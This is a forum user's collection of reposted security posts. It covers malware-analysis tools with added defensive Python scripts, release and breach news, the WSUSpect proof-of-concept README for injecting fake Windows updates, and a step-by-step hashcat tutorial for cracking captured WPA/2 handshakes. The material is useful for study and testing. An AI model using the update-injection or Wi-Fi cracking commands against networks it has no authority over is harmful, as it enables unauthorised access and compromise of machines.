Everything posted by Nytro
-
There are plenty of tools for behavioral malware analysis. The de facto standard ones, though, are Sysinternals' Process Monitor (also known as Procmon) and PCAP-generating network sniffers like Windump, Tcpdump, Wireshark, and the like. These "two" tools cover almost everything a malware analyst might be interested in when doing behavioral malware analysis.

But there's a major problem with these tools. Each of them works in a, so to say, separated or isolated way, not knowing anything of the others. Hence it's kind of hard to get accordingly recorded activities together in one piece or picture. That's where ProcDOT enters the stage. It fills this gap by merging those records together. But ProcDOT does much more. It turns those thousands of monitored activities into a big behavioral picture - actually a graph - which can be interactively explored, making behavioral malware analysis as efficient as it never was before.

In these terms ProcDOT enables you to ...
• Get an overall gut feeling for an entire situation within a glance,
• Spot relevant parts and understand the correlation between them in minutes

Sursa: ProcDOT's Home
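The post describes ProcDOT turning a Procmon record into a behavioral graph. The script below is an added example (not ProcDOT's code and not from the post) that does the Procmon half of that idea: it reads rows in Procmon's CSV export layout (the column names "Time of Day", "Process Name", "PID", "Operation", "Path", "Result", "Detail" are assumed to match that export), keeps only the operations that change state (process creation, writes, registry sets, network connections), drops reads and failed calls as noise, and emits a Graphviz DOT graph. The sample trace is constructed for the example; the PCAP merge that ProcDOT adds is not covered here.

```python
"""Build a Graphviz DOT behaviour graph from Procmon CSV rows (added example, not ProcDOT's code)."""
import csv
import io
import re
from typing import Dict, Set, Tuple

# Constructed sample in Procmon's CSV export layout (columns assumed; rows are invented, not a real trace).
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.000","explorer.exe","1234","Process Create","C:\\Users\\lab\\dropper.exe","SUCCESS","PID: 4321, Command line: dropper.exe"
"10:00:01.100","dropper.exe","4321","CreateFile","C:\\Users\\lab\\AppData\\Roaming\\svc.exe","SUCCESS","Desired Access: Generic Write"
"10:00:01.200","dropper.exe","4321","WriteFile","C:\\Users\\lab\\AppData\\Roaming\\svc.exe","SUCCESS","Offset: 0, Length: 65536"
"10:00:01.300","dropper.exe","4321","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc","SUCCESS","Type: REG_SZ, Data: svc.exe"
"10:00:01.400","dropper.exe","4321","TCP Connect","lab-pc:49152 -> 203.0.113.10:443","SUCCESS","Length: 0"
"10:00:02.000","dropper.exe","4321","ReadFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Offset: 0, Length: 4096"
"""

PROC_CREATE_PID = re.compile(r"PID:\s*(\d+)")
SHAPES = {"process": "box", "file": "note", "registry": "folder", "network": "ellipse"}

Nodes = Dict[str, str]                 # node label -> kind
Edges = Set[Tuple[str, str, str]]      # (source, destination, verb)


def proc_node(name: str, pid: str) -> str:
    """One node per (image name, PID) so a respawned process does not merge with its ancestor."""
    return f"{name} ({pid})"


def build_graph(csv_text: str) -> Tuple[Nodes, Edges]:
    nodes: Nodes = {}
    edges: Edges = set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Result"] != "SUCCESS":
            continue  # failed attempts are noise for a first picture
        src = proc_node(row["Process Name"], row["PID"])
        nodes.setdefault(src, "process")
        op, path = row["Operation"], row["Path"]
        if op == "Process Create":
            m = PROC_CREATE_PID.search(row["Detail"])
            child = proc_node(path.rsplit("\\", 1)[-1], m.group(1) if m else "?")
            nodes[child] = "process"
            edges.add((src, child, "spawns"))
        elif op == "WriteFile" or (op == "CreateFile" and "Write" in row["Detail"]):
            nodes.setdefault(path, "file")
            edges.add((src, path, "writes"))
        elif op == "RegSetValue":
            nodes.setdefault(path, "registry")
            edges.add((src, path, "sets"))
        elif op.startswith("TCP") or op.startswith("UDP"):
            remote = path.split("->")[-1].strip()   # Procmon writes "local -> remote"
            nodes.setdefault(remote, "network")
            edges.add((src, remote, op.split()[-1].lower()))
        # reads, queries and closes are dropped: they dominate a trace but rarely tell the story
    return nodes, edges


def q(label: str) -> str:
    """Escape a label for a DOT double-quoted string (Windows paths are full of backslashes)."""
    return label.replace("\\", "\\\\").replace('"', '\\"')


def to_dot(nodes: Nodes, edges: Edges) -> str:
    lines = ["digraph behaviour {", "  rankdir=LR;"]
    for label, kind in sorted(nodes.items()):
        lines.append(f'  "{q(label)}" [shape={SHAPES[kind]}];')
    for src, dst, verb in sorted(edges):
        lines.append(f'  "{q(src)}" -> "{q(dst)}" [label="{verb}"];')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(to_dot(*build_graph(SAMPLE_CSV)))   # pipe into: dot -Tpng -o behaviour.png
```

Run it and feed the output to `dot -Tpng`; the six-row trace collapses to four edges (spawn, write, persistence key, outbound connection), which is the "big picture" the post means, with the kernel32.dll read filtered out.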
-
DensityScout

This tool calculates density (like entropy) for files of any file-system path to finally output an accordingly descending ordered list. This makes it possible to quickly find (even unknown) malware on a potentially infected Microsoft Windows driven machine.

Download latest Windows version
Download latest Linux version

Author: Christian Wojner
Language: English
License: ISCL

Releases | Changes
Build 43 | Important bugfixes
Build 42 | -

Description

DensityScout is a tool that has been written for one purpose: finding (possibly unknown) malware on a potentially infected system. Therefore it takes advantage of the typical approach of malware authors to protect their "products" with obfuscation like run-time packing and encryption. The tool itself is based on the concept of our Bytehist tool, btw.

So what does DensityScout do?

DensityScout's main focus is to scan a desired file-system path by calculating the density of each file to finally print out an accordingly descending list. Usually most Microsoft Windows executables are not packed or encrypted in any way, which throws the hits of malicious executables to the top of the list where one can easily focus on them.

What's Density?

Density can also be understood as "entropy". However, the algorithm behind density is not 100% equal to the one which entropy is based on. So we decided to choose a different name.

Further thinking ...

DensityScout isn't only good for finding malicious executables - it can also be used to find packed or encrypted data containers and the like!

Be aware!

For the ones that are already aware of our investigations regarding "The WOW Effect", be warned on doing live forensics and analysis on 64-bit Microsoft Windows systems using the 32-bit version of DensityScout (or/and any other 32-bit based tool). Use the 64-bit version instead! The ones of you who do not know what this means exactly, please do read our according paper.

Sursa: https://cert.at/downloads/software/densityscout_en.html
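As an added example (not DensityScout's code; the page says its "density" is deliberately not the same formula), here is the plain Shannon-entropy version of the same idea: walk a path, score every file in bits per byte, and list them highest first so packed or encrypted binaries surface at the top. Files are streamed in chunks, tiny files are skipped because their estimate is noise, and unreadable files are skipped rather than aborting the scan. The `demo()` tree is constructed inside a temporary directory.

```python
"""Entropy-ordered file listing, in the spirit of DensityScout (added example, not DensityScout's code)."""
import math
import os
import tempfile
from collections import Counter
from typing import List, Tuple


def entropy_from_counts(counts: Counter, total: int) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant file, 8.0 for uniformly random bytes."""
    if total == 0:
        return 0.0
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def shannon_entropy(data: bytes) -> float:
    return entropy_from_counts(Counter(data), len(data))


def file_entropy(path: str, chunk_size: int = 1 << 20) -> float:
    """Stream the file so large binaries never have to fit in memory."""
    counts: Counter = Counter()
    total = 0
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            counts.update(block)
            total += len(block)
    return entropy_from_counts(counts, total)


def scan_tree(root: str, min_size: int = 64) -> List[Tuple[float, str]]:
    """Walk `root` and return (entropy, path) pairs, highest entropy first.

    Files below `min_size` bytes are skipped: a handful of bytes cannot be
    distinguished from a packed payload by entropy alone.
    """
    results: List[Tuple[float, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) < min_size:
                    continue
                results.append((file_entropy(path), path))
            except OSError:
                continue  # locked or vanished file: keep scanning
    results.sort(key=lambda item: (-item[0], item[1]))
    return results


def demo() -> List[Tuple[float, str]]:
    """Constructed sample tree: a 'packed-looking' file, a text file, a constant file, a tiny file."""
    root = tempfile.mkdtemp(prefix="densdemo_")
    samples = {
        "packed.bin": bytes(range(256)) * 16,            # every byte value equally often -> 8.0 bits
        "readme.txt": b"the quick brown fox jumps over the lazy dog\n" * 100,
        "zeros.dat": b"\x00" * 4096,                      # a single byte value -> 0.0 bits
        "tiny.cfg": b"x=1\n",                             # below min_size, skipped
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return [(ent, os.path.basename(path)) for ent, path in scan_tree(root)]


if __name__ == "__main__":
    for ent, name in demo():
        print(f"{ent:.4f}  {name}")
```

On a real system the same caveat the page raises applies to this script as to any other tool: run a 64-bit interpreter when scanning a 64-bit Windows host, or file-system redirection will hide part of the tree.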
-
Tails 1.7 is out
Posted November 3rd, 2015 by tails in Tails

The Amnesic Incognito Live System, version 1.7, is out.

This release fixes numerous security issues. All users must upgrade as soon as possible.

New features

You can now start Tails in offline mode to disable all networking for additional security. Doing so can be useful when working on sensitive documents.
We added Icedove, a rebranded version of the Mozilla Thunderbird email client. Icedove is currently a technology preview. It is safe to use in the context of Tails but it will be better integrated in future versions until we remove Claws Mail. Users of Claws Mail should refer to our instructions to migrate their data from Claws Mail to Icedove.

Upgrades and changes

Improve the wording of the first screen of Tails Installer.
Restart Tor automatically if connecting to the Tor network takes too long. (#9516)
Update several firmware packages which might improve hardware compatibility.
Update the Tails signing key which is now valid until 2017.
Update Tor Browser to 5.0.4.
Update Tor to 0.2.7.4.

Fixed problems

Prevent wget from leaking the IP address when using the FTP protocol. (#10364)
Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user to bypass read permissions on any file. (#10333)
Force synchronization of data on the USB stick at the end of automatic upgrades. This might fix some reliability bugs in automatic upgrades.
Make the "I2P is ready" notification more reliable.

Known issues

See the current list of known issues.

Download or upgrade

Go to the download or upgrade page.

If you have been updating automatically for a while and your Tails does not boot after an automatic upgrade, you can update your Tails manually.

What's coming up?

The next Tails release is scheduled for December 15.

Have a look at our roadmap to see where we are heading to.

We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us!

Support and feedback

For support and feedback, visit the Support section on the Tails website.

Sursa: https://blog.torproject.org/blog/tails-17-out
-
openSUSE Leap 42.1 Becomes First Hybrid Distribution
November 4th, 2015 by Douglas DeMaio

Bridging Community and Enterprise

The wait is over and a new era begins for openSUSE releases. Contributors, friends and fans can now download the first Linux hybrid distro openSUSE Leap 42.1.

Since the last release, exactly one year ago, openSUSE transformed its development process to create an entirely new type of hybrid Linux distribution called openSUSE Leap. Version 42.1 is the first version of openSUSE Leap that uses source from SUSE Linux Enterprise (SLE), providing a level of stability that will prove to be unmatched by other Linux distributions.

Bonding community development and enterprise reliability provides more cohesion for the project and its contributors' maintenance updates. openSUSE Leap will benefit from the enterprise maintenance effort and will have some of the same packages and updates as SLE, which is different from previous openSUSE versions that created separate maintenance streams. Community developers provide an equal level of contribution to Leap and upstream projects to the release, which bridges a gap between matured packages and newer packages found in openSUSE's other distribution, Tumbleweed.

Since the move was such a shift from previous versions, a new version number and version naming strategy was adopted to reflect the change. The SLE sources come from SUSE's soon to be released SLE 12 Service Pack 1 (SP1). The naming strategy is SLE 12 SP1 or 12.1 + 30 = openSUSE Leap 42.1. Many have asked why 42, but SUSE and openSUSE have a tradition of starting big ideas with a four and two, a reference to The Hitchhiker's Guide to the Galaxy.

With every minor version of openSUSE Leap users can expect a new KDE and GNOME, but today is all about openSUSE Leap 42.1, so if you are tired of a brown desktop, try a green one. Have a lot of fun!

More info: https://news.opensuse.org/2015/11/04/opensuse-leap-42-1-becomes-first-hybrid-distribution/
-
We do not allow such things.
-
vBulletin Website Offline After Hacker Attack
By Eduard Kovacs on November 02, 2015

The developers of the vBulletin forum software have taken down their official website and forum following a hacker attack that may have resulted in user data getting stolen.

Users who attempted to access the vBulletin forum on Sunday were greeted by a message that read "Hacked by Coldzer0." The website and forum currently display a "down for maintenance" message.

The extent of the damage is unclear, but the hacker has published screenshots apparently showing that he managed to upload a shell to the vBulletin website and obtain user data, including user IDs, names, email addresses, security questions and answers, and password salts, DataBreaches.net reported.

Internet Brands-owned vBulletin Solutions has yet to release a statement on the incident and the company could not immediately be reached for comment.

Users should change their passwords as a precaution as soon as the website comes back online. If the same password is used on other websites, it should be changed there as well.

The attacker claims to have used a zero-day vulnerability in vBulletin to hack this and other websites powered by the popular forum software.

DataBreaches.net has connected the online moniker "Coldzer0" to Mohamed Osama, a malware analyst and security researcher based in Egypt. Osama has removed all references to the vBulletin attack from his social media accounts, and deleted the content of his personal website after his name was linked to the breach.

Vulnerabilities in unpatched versions of vBulletin are often leveraged to breach websites using the forum software. In 2013, thousands of websites were hacked via a security hole in vBulletin.

Australian security expert Troy Hunt, owner of the Have I Been Pwned service, which allows users to learn if and where their personal data has been compromised, noted that Have I Been Pwned includes data leaked as a result of several vBulletin-powered website breaches.

Sursa: vBulletin Website Offline After Hacker Attack | SecurityWeek.Com
-
Malware Hunting
Date: May 6, 2015, 5:00 p.m. - 6:15 p.m., Day 3, Arie Crown Theater, BRK3319
Speakers: Mark Russinovich

Mark provides an overview of several Sysinternals tools, including Process Monitor, Process Explorer, Autoruns and the new Sysmon tool, focusing on the features useful for malware analysis and removal. These utilities enable deep inspection and control of processes, file system and registry activity, and autostart execution points. He demonstrates their malware-hunting capabilities by presenting several current, real-world malware samples and using the tools to identify and clean malware.

Link: https://channel9.msdn.com/Events/Ignite/2015/BRK3319
-
WSUSpect Proxy
Written by Paul Stone and Alex Chapman, Context Information Security

Summary

This is a proof of concept script to inject 'fake' updates into non-SSL WSUS traffic. It is based on our Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update'.

White paper: http://www.contextis.com/documents/161/CTX_WSUSpect_White_Paper.pdf
Slides: http://www.contextis.com/documents/162/WSUSpect_Presentation.pdf

Prerequisites

You'll need the Python Twisted library installed. You can do this by running:

pip install twisted

You also need to place a Microsoft-signed binary (e.g. PsExec) into the payloads directory.

This script has been tested on Python 2.7. It does not yet work with Python 3.x; contributions are welcome.

Usage

To test this out, you'll need a target Windows 7 or 8 machine that is configured to receive updates from a WSUS server over unencrypted HTTP. The machine should be configured to proxy through the machine running this script. This can be done by manually changing the proxy settings or via other means such as WPAD poisoning (e.g. using Responder).

python wsuspect_proxy.py payload_name [port]

An example payload for PsExec is set up that will launch cmd.exe running as Administrator:

python wsuspect_proxy.py psexec

If you are having problems getting the script to work, we'd recommend using a GUI proxy tool such as Burp (and configuring Burp to use this script as a proxy) to see if the update XML is being correctly inserted.

Customisation

Modify payloads/payloads.ini to change the payloads and their arguments.

Known Issues

Currently doesn't support Windows 10 targets
Doesn't yet support Python 3

Sursa: https://github.com/ctxis/wsuspect-proxy
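The precondition the README names is a client that fetches updates from WSUS over unencrypted HTTP. The script below is an added example (not the WSUSpect project's code) of the check a defender runs to find that condition: it evaluates the WSUS client policy values that Group Policy writes (WUServer and WUStatusServer under SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, UseWUServer under its AU subkey) and flags any server URL whose scheme is not https. On Windows it reads the live registry; elsewhere it falls back to the constructed sample policies embedded in the file, which use the conventional WSUS ports 8530 (HTTP) and 8531 (HTTPS) and an invented host name.

```python
"""Audit the WSUS client policy for plain-HTTP update servers (added example, not the WSUSpect project's code)."""
import sys
from typing import Dict, List, Optional, Union
from urllib.parse import urlsplit

# WSUS client policy location written by Group Policy; value names are the documented ones.
POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"
AU_KEY = POLICY_KEY + r"\AU"

Policy = Dict[str, Optional[Union[str, int]]]


def audit_wsus_policy(policy: Policy) -> List[str]:
    """Return findings for a WSUS client policy.

    Keys mirror the registry values: WUServer and WUStatusServer (strings) and
    UseWUServer (DWORD). A client is only exposed to update injection when it
    is actually pointed at a WSUS server and that server is reached without TLS.
    """
    findings: List[str] = []
    use_wsus = policy.get("UseWUServer")
    server = policy.get("WUServer")
    status = policy.get("WUStatusServer")

    if not use_wsus or not server:
        findings.append("INFO: client is not pointed at a WSUS server (UseWUServer/WUServer unset)")
        return findings

    for name, url in (("WUServer", server), ("WUStatusServer", status)):
        if not url:
            findings.append(f"WARN: {name} is empty")
            continue
        parts = urlsplit(str(url))
        if parts.scheme.lower() != "https":
            findings.append(
                f"HIGH: {name}={url} uses {parts.scheme or 'no'} scheme; update metadata "
                "travels unauthenticated and can be rewritten by an on-path proxy"
            )
        elif not parts.hostname:
            findings.append(f"WARN: {name}={url} has no host")
    return findings


def read_policy_from_registry() -> Policy:
    """Read the live policy on Windows; on other platforms return an empty policy."""
    if sys.platform != "win32":
        return {}
    import winreg  # standard library, Windows only

    policy: Policy = {}
    for key_path, names in ((POLICY_KEY, ("WUServer", "WUStatusServer")), (AU_KEY, ("UseWUServer",))):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
                for name in names:
                    try:
                        policy[name] = winreg.QueryValueEx(key, name)[0]
                    except FileNotFoundError:
                        policy[name] = None
        except FileNotFoundError:
            pass  # key absent: no WSUS policy applied
    return policy


# Constructed sample policies (invented host; not taken from any real environment).
WEAK_POLICY: Policy = {"UseWUServer": 1, "WUServer": "http://wsus.corp.example:8530",
                       "WUStatusServer": "http://wsus.corp.example:8530"}
HARDENED_POLICY: Policy = {"UseWUServer": 1, "WUServer": "https://wsus.corp.example:8531",
                           "WUStatusServer": "https://wsus.corp.example:8531"}

if __name__ == "__main__":
    live = read_policy_from_registry() or WEAK_POLICY
    for line in audit_wsus_policy(live) or ["OK: WSUS client policy uses HTTPS"]:
        print(line)
```

The fix the findings point to is on the server side as well as the client: publish WSUS over HTTPS with a certificate the clients trust, then repoint WUServer and WUStatusServer at the https URL.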
-
WPA/2 Cracking Using HashCat [ch5pt2]
by rootsh3ll | Oct 31, 2015

Hello reader and welcome to part 2 from chapter 5 of the WiFi Security and Pentesting Series. If you remember, in the previous part we learned Speeding up WPA/2 Cracking Using Pre-generated PMKs, which uses the CPU as the primary part for the calculation of the PMKs. It surely gives us speed for cracking, as while using PMKs for cracking we are not performing actual calculations in real time. This brings us to some drawbacks of using PMKs, as follows:

SSID specific. You cannot use PMKs generated for an SSID, say "rootsh3ll", for another SSID like "Belkin".
Case-sensitive. Cannot be used if even a single letter is upper/lower case. Ex: won't work for "Rootsh3ll" if PMKs are created for "rootsh3ll".
Time used is the same. As the processing power of the CPU is the same in both cases, the time required for creating PMKs is equal whether you crack using Aircrack or create PMKs (with GenPMK).
Huge HD space required. As we are pre-calculating the PMKs and storing them on HD, it requires a lot of space on your HD, and that too for a specific SSID. Which is not an option all the time.
Less helpful in today's scenario. Nowadays routers are being shipped with a unique SSID, ex: Belkin_04A2, for preventing routers from these kinds of attacks or at least delaying the cracking duration.

You might be thinking now that if this is so, then why would I even consider PMKs for cracking? Well, as I said above, this is less helpful, that means in some cases. Cases like:

Simple SSIDs. Ex: MTNL, Airtel, Linksys etc.
Before trying any complex task to crack the PSK, if you have PMKs already stored, give them a shot.
Mobile numbers are still very common passwords.

Still, even if this gives us speed, this method is a bit slow. You don't always have a friend ready to give you a pre-generated PMK file for a specific SSID just when you have captured the handshake, right? Yeah, it's very rare!
Here is when you need to stop using your CPU and test the processing power of your GPU. If you are not aware of using GPUs for cracking purposes, let me tell you: yes, GPUs can be used for cracking password hashes and have been used for a while now. There are plenty of tools which use the GPU to boost the cracking speed and let you crack in way less time than your CPU would need to get the job finished. Tools like:

Pyrit
BarsWF
HashCat
igHashGPU

How? Simple! Your CPU has 2, 4, 8 cores, meaning parallel computing units, where GPUs have them in thousands, if not hundreds.

NOTE: My GeForce GT 525M has 296 cores, and it is a pretty old graphics card. Speed: ~6000 PMK/s. NVidia Titan X is the best single graphics card with cracking speed up to 2,096,000 hashes/sec.

Using GPU for Cracking WPA/2 Passwords

Being in the scope of the series, we will stick to WPA/2 cracking with GPU in this chapter. For learning the difference between CPU and GPU cracking you can visit the following post I'd previously written on FromDev.com: CPU vs. GPU Password Hash Cracking – FromDev.com

The tools described above are used for cracking various kinds of passwords. There are 2 tools used for cracking WPA/2-PSK using GPU from the above list:

Pyrit
HashCat

As the post title suggests, we will go with HashCat.

What is HashCat?

Hashcat is a self-proclaimed command-line based world's fastest password cracker. It is the world's first and only GPGPU based rule engine and is available for Linux, OSX, and Windows free of cost. It comes in 2 variants:

CPU based
GPU based

There is no difference when passing commands to Hashcat because it automatically uses the best method to crack passwords, either CPU or GPU, depending on whether you have the graphics driver installed or not. Hashcat is fast and extremely flexible; the writer made it in such a way that allows distributed cracking. There are multiple versions of HashCat, each optimized and suited for different methods of cracking (dictionary, single hash, distributed etc).
I highly recommend Hashcat over Pyrit for its flexibility.

Why use HashCat in the first place?

As already told above, because of its flexibility and vast support of algorithms.

But why Hashcat when I just want to crack WPA/2 most of the time?

If you have used or haven't used Pyrit yet, let me tell you one thing. Pyrit is perhaps the fastest WPA/2 cracker available on the internet, but it uses a dictionary or wordlist to crack the passwords; even if you use PMKs or directly run the cracker, you need to have a large amount of dictionaries to test the validity of the hash. For storing hashes you need a lot of disk space. As you can see in the image below, there are a few wordlists that take almost >25 GB on the disk (extracted), and it takes more than 2-3 days to run through them all even with GPU. You can download some useful wordlists here.

But most of the time there are some patterns (default passwords) we like to test for validity. Patterns like:

Mobile number
Date of birth
Default password patterns like "56324FHe"
10 digit default password by ISP
and so on

Here is when we have to leave Pyrit with its dictionaries and get our hands on HashCat. HashCat has a brilliant feature called mask attack, which allows us to create user-defined patterns to test for password validity, and you know what the best thing is? It requires 0 bytes on your hard drive. How?

Before we go through this we need to understand that in some cases we need wordlists. It's only when we are 100% certain that it has some kind of pattern that we can use this type of attack. So if you know a certain ISP has 10 random numbers and only a few letters, you could do it to save space on your HD.

WPA/2 cracking is a tedious task and uses the maximum power of the system when we use Hashcat for the purpose, and sometimes it needs to take down the load from the system to switch tasks. Hashcat stands best here for its remarkable feature.
It supports pause/resume while cracking
Supports sessions and restore

We will see this feature in this tutorial. Keep reading.

Supported attack types

Dictionary based attack
Brute-force/Mask attack
Hybrid dict + mask
Hybrid mask + dict
Permutation attack
Rule-based attack
Toggle-case attack

These are to name a few. Hashcat supports way too many algorithms to get your hash cracked.

NOTE: Traditional brute-force attack is outdated and is replaced by Mask attack in Hashcat. We will see later in this post in detail about this.

Variants

As told above, Hashcat comes in 2 variants:

Hashcat - CPU based password cracker
oclHashcat/cudaHashcat - GPU accelerated tool

Setting up the Lab

Installing graphics driver

You have basically 2 choices:

Install graphics driver in Kali Linux directly, i.e. your pentesting distro.
Install graphics driver in Windows or OSX.

I have Kali Sana installed in my virtual machine and unfortunately no virtual machine supports using graphics card or GPU acceleration inside the virtual OS. So I'll be sticking with Hashcat on Windows. You can still do the same task with the exact same commands on Kali Linux (or any Linux OS) or OSX with properly installed proprietary drivers.

I haven't written any article on how to install graphics drivers in Kali Linux as BlackmoreOps already has a great article on the same, so you can follow the links and try installing the same on your version of Kali.

NVidia users:
Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver
Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda

AMD users:
Install AMD ATI proprietary fglrx driver in Kali Linux 1.x/2.x
Install AMD APP SDK in Kali Linux
Install CAL++ in Kali Linux

Download HashCat

You can download Hashcat from its official website: http://hashcat.net/

The file is highly compressed using 7z compression, so make sure you have at least 1 GB before extracting the downloaded file.
You can use the 7zip extractor to decompress the .7z file. Download it here: http://www.7-zip.org/download.html
P.S: It is free to use and better than WinRAR.

Clean up your cap file using wpaclean

The next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand. Here's how to do it:

To convert your .cap files manually in Kali Linux, use the following command:

wpaclean <out.cap> <in.cap>

Please note that the wpaclean options are the wrong way round: <out.cap> <in.cap> instead of <in.cap> <out.cap>, which may cause some confusion.

Convert .cap file to .hccap file

Now assuming that you have installed the appropriate graphics driver for the selected OS, moving on to the next step. We need to convert the previously captured handshake, i.e. the .cap file, to a format that hashcat can understand, and that is the .hccap file format. Nothing difficult or time taking. The command to convert .cap to .hccap goes like this:

aircrack-ng -J <output.hccap> <path/to/.cap file>

Here output.hccap is the output filename with .hccap file format and input.cap is the handshake originally captured. Log in to Kali Linux, open Terminal and type:

aircrack-ng -J "rootsh3ll-01.hccap" "rootsh3ll-01.cap"

Note: rootsh3ll-01.cap is located on Desktop. Check the location of your .cap file.

Now we have the .hccap file, installed graphics driver and downloaded hashcat. Let's begin the cracking.

Cracking WPA/2 Passwords using Hashcat

We will cover the following topics:

WPA/2 cracking with Dictionary attack using Hashcat.
WPA/2 cracking with Mask attack using Hashcat.
WPA/2 cracking with Hybrid attack using Hashcat.
WPA/2 cracking pause/resume in Hashcat (one of the best features)
WPA/2 cracking save sessions and restore.
WPA/2 dictionary attack using Hashcat

Open cmd and direct it to the Hashcat directory, copy the .hccap file and wordlists and simply type in cmd:

cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap wordlist.txt wordlist2.txt

Here I have NVidia's graphics card, so I use the cudaHashcat command followed by 64, as I am using Windows 10 64-bit version. Yours will depend on the graphics card you are using and Windows version (32/64).

cudaHashcat64.exe – the program. In the same folder there's a cudaHashcat32.exe for 32-bit OS and cudaHashcat32.bin / cudaHashcat64.bin for Linux. oclHashcat*.exe for AMD graphics cards.
-m 2500 = the specific hash type. 2500 means WPA/WPA2. In case you forget the WPA2 code for Hashcat:
Windows CMD: cudaHashcat64.exe --help | find "WPA"
Linux Terminal: cudaHashcat64.bin --help | grep "WPA"
It will show you the line containing "WPA" and the corresponding code.
Handshake-01.hccap = the converted *.cap file.
wordlist.txt wordlist2.txt = the wordlists; you can add as many wordlists as you want.

To simplify it a bit, every wordlist you make should be saved in the cudaHashcat folder. After executing the command you should see a similar output:

Wait for Hashcat to finish the task. You can pass multiple wordlists at once so that Hashcat will keep on testing the next wordlist until the password is matched.

WPA/2 Mask attack using Hashcat

As told earlier, Mask attack is a replacement of the traditional brute-force attack in Hashcat for better and faster results. Let's have a look at what Mask attack really is. In Terminal/cmd type:

cudaHashcat64.exe -m 2500 <rootsh3ll-01.hccap> -a 3 ?d?l?u?d?d?d?u?d?s?a

-a 3 is the attack mode, custom character set (Mask attack)
?d?l?u?d?d?d?u?d?s?a is the character set we passed to Hashcat.

Let's understand it in a bit of detail: what is a character set in Hashcat? Why is it useful?

What is a character set in Hashcat?

?d ?l ?u ?d ?d ?d ?u ?d ?s ?a = 10 letters and digits long WPA key. Can be 8-63 chars long.
The above text string is called the "Mask". Every pair we used in the above examples will translate into the corresponding character that can be an alphabet/digit/special character. For remembering, just see the character used to describe the charset:

?d: for digits
?s: for special characters
?u: for uppercase alphabets
?l: for lowercase alphabets
?a: all of the above.

Simple! Isn't it? Here is the actual character set which tells exactly what characters are included in the list:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s

Here are a few examples of how the PSK would look when passed a specific Mask.

PSK = ?d?l?u?d?d?d?u?d?s?a
0aC575G2/@
9zG432H0*K
8sA111W1$4
3wD001Q5+z

So now you should have a good understanding of the mask attack, right? Let's dig a bit deeper now.

Mixing Mask attack with custom characters

Let's say we somehow came to know a part of the password. So, it would be better if we put that part in the attack and randomize the remaining part in Hashcat, isn't it? Sure! It is very simple. Just put the desired characters in place and the rest with the Mask.

He ?d ?l 123 ?d ?d ?u ?d C

is the custom Mask attack we have used. Here, assuming that I know the first 2 characters of the original password, then setting the 2nd and third character as digit and lowercase letter, followed by "123" and then "?d ?d ?u ?d" and finally ending with "C" as I knew already. What we have actually done is that we have simply placed the characters in the exact position we knew and masked the unknown characters, hence leaving it to Hashcat to test further.

Here is one more example for the same: let's say the password is "Hi123World" and I just know the "Hi123" part of the password, and the remaining are lowercase letters.
Assuming the length of the password to be 10, I would simply use the command below:

cudaHashcat64.exe -m 2500 <handshake.hccap> -a 3 Hi123?u?u?u?u?u

Where ?u will be replaced by lowercase letters, one by one, till the password is matched or the possibilities are exhausted.

Moving on even further with Mask attack, i.e. the Hybrid attack. In a hybrid attack what we actually do is we don't pass any specific string to hashcat manually, but automate it by passing a wordlist to Hashcat. Hashcat picks up words one by one and tests them against every password possible by the Mask defined.

Example:

cudaHashcat64.exe -m 2500 handshake.hccap -a 1 password.txt ?d?l?d?l

-a 1 : the hybrid attack
password.txt : wordlist
?d?l?d?l = Mask (4 letters and numbers)

The wordlist contains 4 words:

carlos
bigfoot
guest
onion

Now it will use the words and combine them with the defined Mask and the output should be this:

carlos2e1c
bigfoot0h1d
guest5p4a
onion1h1h

It is cool that you can even reverse the order of the mask, meaning you can simply put the mask before the text file. Hashcat will bruteforce the passwords like this:

7a2ecarlos
8j3abigfoot
0t3wguest
6a5jonion

You're getting the idea now, right?

Using so many dictionaries at once, using long Masks or Hybrid+Masks takes a long time for the task to complete. It is not possible for everyone every time to keep the system on and not use it for personal work, and the Hashcat developers understand this problem very well. So, they came up with a brilliant solution which no other password recovery tool offers built-in at this moment. That is the Pause/Resume feature.

WPA/2 Cracking Pause/resume in Hashcat (one of the best features)

This feature can be used anywhere in Hashcat. It isn't just limited to WPA/2 cracking, even if you are cracking md5, SHA1, OSX, wordpress hashes.
As soon as the process is in running state you can pause/resume the process at any moment. Just press [p] to pause the execution and continue your work. To resume press [r]. All the commands are just at the end of the output during task execution. See image below.

You might sometimes feel this feature is a limitation as you still have to keep the system awake, so that the process doesn't get cleared away from the memory. And we have a solution for that too. Create a session!

WPA/2 Cracking save Sessions and Restore

Creating and restoring sessions with hashcat is extremely easy. Just add --session at the end of the command you want to run, followed by the session name. Example:

cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap -a 3 Hello?d?l?d?u123?l?l?u --session=blabla

Here I named the session "blabla". You can see in the image below that Hashcat has saved the session with the same name, i.e. blabla, and is running. Now you can simply press [q], close cmd, shut down the system, come back after a holiday, turn on the system and resume the session. That easy!

